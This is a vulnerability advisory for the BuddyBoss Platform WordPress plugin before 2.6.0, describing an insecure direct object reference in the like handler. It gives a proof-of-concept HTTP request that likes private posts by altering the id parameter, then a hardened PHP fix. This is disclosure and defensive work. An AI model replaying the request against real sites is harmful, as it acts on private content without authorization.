wpvulndb | Faris Krivić | WPVDB-ID: FFBE4034-842B-43B0-97D1-208811376DEA
History: May 14, 2024 - 12:00 a.m.

BuddyBoss Platform < 2.6.0 - Insecure Direct Object Reference on Like Comment

Published: 2024-05-14 00:00:00
Author: Faris Krivić
Source: wpscan.com
Tags: buddyboss platform, insecure direct object reference, idor vulnerability, unauthorized liking, private posts, poc, software

AI Score: 6.4 Medium (Confidence: High)
EPSS: 0.0004 Low (Percentile: 9.0%)

Description

The plugin contains an IDOR (Insecure Direct Object Reference) vulnerability: the AJAX handler that marks an activity item as liked acts on the post ID supplied in the request without checking that the requesting user is allowed to see that post, so a user can like a private post by manipulating the ID included in the request.

PoC

POST /wp-admin/admin-ajax.php HTTP/2
Host: buddyboss.example.com
Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://buddyboss.example.com/members/adele/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 72
Origin: https://buddyboss.example.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

scope=all&nonce=2081885524&action=activity_mark_fav&id=194628&modbypass=

By changing the id parameter it is possible to like an arbitrary post, including one the requesting user cannot view.
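The fix for this class of bug is an authorization check performed server-side on the object the client referenced, not on the request alone. The following is an added illustrative example, not BuddyBoss's or WPScan's code: a hardened admin-ajax handler in the style of a BuddyPress-based plugin that verifies the nonce, resolves the activity item from the submitted id, and confirms the current user may read that item before recording the like. The action name example_mark_fav and the function example_mark_activity_favorite are hypothetical; BP_Activity_Activity, bp_activity_user_can_read() and bp_activity_add_user_favorite() are assumed to be the BuddyPress APIs available to the plugin.

```php
<?php
// Added illustrative example (not BuddyBoss's code). Hook and function names are
// hypothetical; the BP_* class and bp_activity_* functions are assumed to come
// from BuddyPress and to be loaded before this handler runs.

add_action( 'wp_ajax_example_mark_fav', 'example_mark_activity_favorite' );

function example_mark_activity_favorite() {
    // Reject forged cross-site requests (nonce) and logged-out users up front.
    check_ajax_referer( 'example_mark_fav', 'nonce' );
    if ( ! is_user_logged_in() ) {
        wp_send_json_error( array( 'message' => 'Authentication required.' ), 401 );
    }

    // Treat the id as untrusted input: coerce to a non-negative integer.
    $activity_id = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;
    if ( 0 === $activity_id ) {
        wp_send_json_error( array( 'message' => 'Invalid activity id.' ), 400 );
    }

    // Load the referenced object and make the authorization decision here, on
    // the server, for the user who is actually logged in. This is the check the
    // IDOR-affected handler lacked: an attacker-chosen id must not be acted on
    // unless the current user is permitted to see that activity item.
    $activity = new BP_Activity_Activity( $activity_id );
    $user_id  = get_current_user_id();
    if ( empty( $activity->id ) || ! bp_activity_user_can_read( $activity, $user_id ) ) {
        // One response for "does not exist" and "not yours to see", so the
        // endpoint cannot be used to enumerate private post ids.
        wp_send_json_error( array( 'message' => 'Not found.' ), 404 );
    }

    // Only now perform the state change, scoped to the authenticated user.
    if ( ! bp_activity_add_user_favorite( $activity->id, $user_id ) ) {
        wp_send_json_error( array( 'message' => 'Could not mark favourite.' ), 500 );
    }

    wp_send_json_success( array( 'id' => $activity->id ) );
}
```

The ordering matters: nonce and login checks stop unauthenticated and cross-site abuse, but neither says anything about whether this user may touch this object. The visibility check against the loaded activity is what closes the IDOR, and returning the same 404 for missing and forbidden items avoids turning the like endpoint into an oracle for private post ids.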

CPE
Name: (not captured)  Operator: eq  Version: 2.6.0
